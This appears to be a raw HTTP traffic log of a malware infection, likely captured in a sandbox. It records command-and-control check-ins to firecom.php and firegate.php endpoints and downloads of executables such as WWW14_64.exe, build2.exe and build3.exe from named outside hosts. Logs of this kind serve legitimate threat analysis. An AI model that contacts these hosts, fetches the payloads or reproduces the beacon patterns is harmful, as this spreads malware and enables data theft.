POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:17 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:17 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 42 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/WWW14_64.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:18 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:22 GMT ETag: "677c00-6067cccd916ee" Accept-Ranges: bytes Content-Length: 6781952 Content-Type: application/x-msdos-program

GET /download/WWW14_64.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:19 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:22 GMT ETag: "677c00-6067cccd916ee" Accept-Ranges: bytes Content-Length: 6781952 Content-Type: application/x-msdos-program

GET /xs12pro/Vdthrdd.pdf HTTP/1.1 Host: 172.86.98.101 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 10 Oct 2023 11:29:27 GMT ETag: "7ca10-6075b04f753c0" Accept-Ranges: bytes Content-Length: 510480 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf

GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: colisumy.com

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 11 Oct 2023 06:40:45 GMT Content-Type: application/octet-stream Content-Length: 413696 Last-Modified: Tue, 10 Oct 2023 11:18:03 GMT Connection: close ETag: "652532eb-65000" Accept-Ranges: bytes

GET /test2/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:36 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 558 Connection: close Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 285 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:38 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:49 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT ETag: "4ae00-6074de5a4a562" Accept-Ranges: bytes Content-Length: 306688 Connection: close Content-Type: application/x-msdownload

POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 8 Host: bytecloudasa.website

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tr84Fi9Pw%2Fhk8%2Fzy3C0SqRFaCZpiGU6T9fTAg0zwrnQJrNgix49XgRoYowtqDJgQdfW3y8CgHDJZ5tE1TNSX7c1WheBuRUIO290WY8GXgpQ5v1oO9vpNmEnMGFWiIIZT3aTyMiHILA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451d272fd58391-KIX

POST /api HTTP/1.1 Cookie: __cf_mw_byp=zD1HWNxw0qhaYoSpnqaoomiEV8AfmgRBdwTLVq0Tem8-1697006449-0-/api Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Host: bytecloudasa.website Content-Length: 56 Cache-Control: no-cache

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QMBurcgAaBhw_boRC5SbwQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2314 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-11-06; expires=Fri, 10-Nov-2023 06:40:53 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1QCoaNc1DKDP5lF1BiOIkTtvFCVv89KvgJlDBEi5e9VkWEm3p5n0w; expires=Mon, 08-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=mFMOl1skP3O1Krr7IGoITpSHQ94wx4QSHiUsmIwLAaoXGcmPcY7URZfFNJ3x3iqzwgb9eLh4av46lTp_IySD5zj-MIqQ7ej3KjEebTKqd3Uht1HeTbja65gI92txwKpQ-hszObQ_aC0ZCzG-RY3QvzEWJeYqjm9TxaQYnriovqw; expires=Thu, 11-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-xhBt_JrPuD8HyetipyQd4w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2317 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-11-06; expires=Fri, 10-Nov-2023 06:40:53 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1QvF54eVMHq_IVz5mx5X4dFBRfNPTeIeRylYGGxXv30L6-NTLzizBY; expires=Mon, 08-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=nTPL4WVib2o7Id9vYcJGFbGex-zJKfRiBix85USJgxCuQT6gYis_HJuSRriNr3OlqSpm3DtZl73GKqHrMNMIVWcJwqu1TwpMGOuQgMoQ1GqjzcSoL8nkEWS52HTH6e3dh9mjkDJnZ6DyUa8Acdvb7eDizvh5zVeSRUQsMkC0yRA; expires=Thu, 11-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Tdf4zCujfbSUPtVl1_sPjA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2316 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-11-06; expires=Fri, 10-Nov-2023 06:40:53 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1TrataqXVkyX17roezLKTWywTDt84KWTwl8X_3BWpjQJK_STB9WeL8; expires=Mon, 08-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=OZP50DLwla7BbKhNXweNx1vDnhnaudbpXw0_MAWUjcgE1kGFX3YKvxOB0hvbiktNyEnhOOrXsECDBsTkerYNoUNsFpyBGDuFFq5T_Et-rtYLZzy_4aOS1xafT2BGdZXLJ2680PH89qSROBDBuvZhD9Gf9AZyr57N0KxpyJC0qKs; expires=Thu, 11-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-iumzPw2-FBxQOp0OYp-2Bw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2317 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-11-06; expires=Fri, 10-Nov-2023 06:40:53 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1T4598FIbJznGToDZt6HU0x_nzOE-zSvVf-9TuLh3odJsCo84T0AQE; expires=Mon, 08-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=E7swvZBHBqVxE3HtUf2PEE_rdfvSb7Uu_toB0oBHbVFu3oSmbxnpUkwngX9KqoA5q55Xz6fAPZtwbzmk7zB5PtCbxuET7S0-peG3XluURAEb7Dd3FDDJRhw0BH15ZsMcWUe_o9Qtk83If-4DQB7KVFgPec-IF069V7swxNGm1nk; expires=Thu, 11-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ap4th3SCiIbcjA3FaSEGSw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2315 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-11-06; expires=Fri, 10-Nov-2023 06:40:53 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1QLPOu3BRYPRvlTTcr3H8v_u7htooLuQEySF49d4MDoMkkEN_sKUsk; expires=Mon, 08-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=EVyiaGfyhmqli-Riim1UfyOP8bzyd6QkCFCbA_kXM_P0um2_0x615Gpf0j_1-6tefTp9XDqQSUdFbvet9NRvgz5t6KlYRvZFkr3NPH3pRi1kf3iKOfo86ZSxODYZ-D50muk6so8MOEFIc5LxfL18jACUzbOZRlnQllG-7_EZlO4; expires=Thu, 11-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-b3HyRalhXw0ESm7CfHOGcA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2312 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-11-06; expires=Fri, 10-Nov-2023 06:40:53 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1RgRf_5EDQGodhisqfcBkVgN34o78ZjDNlywdk2A5uZzo3Adk7treg; expires=Mon, 08-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=PX-MnqjT9K_c-tFphjlCNIuuDoIDSCh3RVZCfpNkYWvLboREErsfZhAfHmh9F0TP46uK27QP4aMpFF3-ql0CT0OWtPLZ4x4Ol6eUGSikuek_UFlYO8gmHmEs6DfWeHSQFer8bnaZFdh2780X9RH9QyxnDj52Xmb_l9-BXz_2l9Y; expires=Thu, 11-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-RCVzmaqIEoY2MsC31dCnRA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2313 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-11-06; expires=Fri, 10-Nov-2023 06:40:53 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1RfpuSEWvFeL3vuykKnCaj_F8zNWxjhoZpdflRuiDsufgBo1mxZMJM; expires=Mon, 08-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=BALP780I-nuIaf-1VzxSDaKm_9bnJ55COOali6GmKVAh23nCVAoBmjE6j-b4d8Gp2TDQT0AnPRg9Qpo22_tdpj9XiDuKR2AWfWUB30f_vSOHxhXghBol5d2oHwFGxa-VBwjEZlLom2NOjC2lbCv7EqBkCW44lugyVIrWemMKRLA; expires=Thu, 11-Apr-2024 06:40:53 GMT; path=/; domain=.google.com; HttpOnly